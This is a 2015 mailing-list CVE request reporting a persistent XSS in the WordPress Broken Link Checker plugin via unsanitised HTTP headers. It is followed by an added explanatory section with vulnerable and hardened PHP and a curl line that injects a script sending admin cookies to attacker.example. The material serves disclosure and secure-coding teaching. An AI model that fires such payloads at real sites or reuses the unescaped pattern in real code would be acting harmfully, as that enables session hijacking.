Message-ID: <558AC98E.4070709@hsasec.de>
Date: Wed, 24 Jun 2015 17:15:26 +0200
From: Responsive Disclosure | HSASec <disclosure@...sec.de>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>, 
 cve-assign@...re.org
Subject: CVE Request for Wordpress-Plugin Broken Link Checker v1.10.8: Persistent
 XSS in admin panel enabled by modified headers

Greetings,

we discovered a vulnerability in the following component and want to
request a CVE for it:

Product-Type:     Wordpress Plugin
Product:          Broken Link Checker (https://wordpress.org/plugins/broken-link-checker/)
Version:          up to 1.10.8
Vendor:           Janis Elsts (http://w-shadow.com/)
Fixed:            reported: 2015-04-05
                  fixed in version 1.10.9, 2015-06-19
Changelog:        https://wordpress.org/plugins/broken-link-checker/changelog/
PoC available:    yes (internal)

Description:
Persistent XSS in the WordPress admin panel, enabled by improperly sanitized
HTTP headers.
No special privileges are required to exploit this vulnerability.

Researchers:
* Michael Kapfer (Michael.Kapfer@...augsburg.de)


Best regards,
 the HSASec-Team
 (https://www.hsasec.de)
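The report does not say which header Broken Link Checker stored or where it was rendered, so the following is an added, generic illustration of the bug class it names (a request header recorded by an unauthenticated request and later echoed raw into a wp-admin page), not the plugin's own code. The `plugin_prefix_*` function names, the option name and the choice of `User-Agent` are assumptions made for the example; the WordPress API calls (`get_option`, `update_option`, `wp_unslash`, `sanitize_text_field`, `esc_html`) are real.

```php
<?php
// Added example, not code from the advisory or from Broken Link Checker.
// Assumptions: plugin_prefix_* names, the 'plugin_prefix_request_log' option,
// and User-Agent as the stored header. Requires the WordPress runtime.

// Constructed attacker input: anyone can send this in a request header to the
// public site, no account needed (this matches "no special privileges").
//   curl -A '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>' https://victim.example/
//
// --- vulnerable pattern -----------------------------------------------------
// 1. Stored verbatim from the front end ...
function plugin_prefix_log_request_vulnerable() {
    $ua  = isset( $_SERVER['HTTP_USER_AGENT'] ) ? $_SERVER['HTTP_USER_AGENT'] : '';
    $log = get_option( 'plugin_prefix_request_log', array() );
    $log[] = $ua;                                    // no sanitisation on input
    update_option( 'plugin_prefix_request_log', $log );
}

// 2. ... and printed raw into an admin screen an administrator later opens.
//    The script then runs with the admin's session in wp-admin: persistent XSS.
function plugin_prefix_render_log_vulnerable() {
    foreach ( get_option( 'plugin_prefix_request_log', array() ) as $entry ) {
        echo '<tr><td>' . $entry . '</td></tr>';     // no escaping on output
    }
}

// --- hardened pattern -------------------------------------------------------
function plugin_prefix_log_request_fixed() {
    $ua = isset( $_SERVER['HTTP_USER_AGENT'] ) ? wp_unslash( $_SERVER['HTTP_USER_AGENT'] ) : '';
    $ua = sanitize_text_field( $ua );                // strip tags/control chars on input
    $ua = mb_substr( $ua, 0, 512 );                  // bound what an attacker can store
    $log   = get_option( 'plugin_prefix_request_log', array() );
    $log[] = $ua;
    update_option( 'plugin_prefix_request_log', $log );
}

function plugin_prefix_render_log_fixed() {
    foreach ( get_option( 'plugin_prefix_request_log', array() ) as $entry ) {
        // Escape at the point of output regardless of what was done on input;
        // the stored value may predate the fix or come from another code path.
        echo '<tr><td>' . esc_html( $entry ) . '</td></tr>';
    }
}
```

The output-side escape is the control that actually closes the hole: data that was already written by an older version, or that reaches the option through another code path, is only neutralised if every `echo` of it goes through `esc_html()` (or `esc_attr()` in attribute context). When auditing a plugin for this class, a quick first pass is to list every read of `$_SERVER['HTTP_*']`, `$_SERVER['REMOTE_ADDR']` and similar, follow each value to where it is persisted, and then check each place that persisted value is printed in wp-admin for a missing `esc_*` call.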
